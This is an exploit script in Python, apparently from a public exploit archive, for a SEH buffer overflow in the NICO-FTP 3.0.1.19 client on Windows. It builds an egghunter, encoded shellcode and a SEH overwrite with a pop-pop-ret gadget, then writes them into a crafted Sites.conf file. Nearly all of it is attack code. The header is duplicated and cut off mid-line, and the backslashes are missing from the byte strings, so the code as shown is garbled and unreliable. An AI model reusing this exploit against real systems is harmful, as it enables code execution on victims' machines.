NICO-FTP 3.0.1.19 SEH Buffer Overflow

# Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)
# Date: 2018-10-04
# Platforms: Windows
# Author: Miguel Mendez Z
# Vendor: Nico-FTP
# Version: 3.0.1.19
# Tested # Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)
# Date: 2018-10-04
# Platforms: Windows
# Author: Miguel Mendez Z
# Vendor: Nico-FTP
# Version: 3.0.1.19
# Tested on: Windows XP_sp3 [es]/ Windows 7_x86 [eng]

#!/usr/bin/python

import struct

# Bad Byte: x0ax0bx0cx0dx0ex0fx5d
happy = (
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3c"
"x05x5ax74xefxb8x30x52x31x53x8bxfaxafx75"
"xeaxafx75xe7xffxe7")
happy += "x90"*50

shell = "x30x52x31x53"*2 # S1R0
shell += "x90"*8
shell += (
"x6ax30x59xd9xeexd9x74x24xf4x5bx81x73x13"
"x25xa8xbex1cx83xebxfcxe2xf4xd9x40x3cx1c"
"x25xa8xdex95xc0x99x7ex78xaexf8x8ex97x77"
"xa4x35x4ex31x23xccx34x2ax1fxf4x3ax14x57"
"x12x20x44xd4xbcx30x05x69x71x11x24x6fx5c"
"xeex77xffx35x4ex35x23xf4x20xaexe4xafx64"
"xc6xe0xbfxcdx74x23xe7x3cx24x7bx35x55x3d"
"x4bx84x55xaex9cx35x1dxf3x99x41xb0xe4x67"
"xb3x1dxe2x90x5ex69xd3xabxc3xe4x1exd5x9a"
"x69xc1xf0x35x44x01xa9x6dx7axaexa4xf5x97"
"x7dxb4xbfxcfxaexacx35x1dxf5x21xfax38x01"
"xf3xe5x7dx7cxf2xefxe3xc5xf7xe1x46xaexba"
"x55x91x78xc2xbfx91xa0x1axbex1cx25xf8xd6"
"x2dxaexc7x39xe3xf0x13x4exa9x87xfexd6xba"
"xb0x15x23xe3xf0x94xb8x60x2fx28x45xfcx50"
"xadx05x5bx36xdaxd1x76x25xfbx41xc9x46xc9"
"xd2x7fx25xa8xbex1c")
shell += "x90"*30

lol = "ftp.pwnd.com"+" "*50
padding = lol+"x41"*(4132-(len(shell)+len(happy)+len(lol)))
next_se = "xEBx90x90x90"
seh_han = struct.pack("<I",0x00422B46) #pop ecx - pop ebp - ret 0x04 -> NicoFtp3.exe
nops = " "*(4881-len(padding))

payload = padding+shell+happy+next_se+seh_han+nops

file = open('Sites.conf','w')
file.write('['+payload+'] Host= Port= UserName= Password= Anonymous=1 Passive=2 UseProxy=1 LocalDir= HostDir= ')
file.close()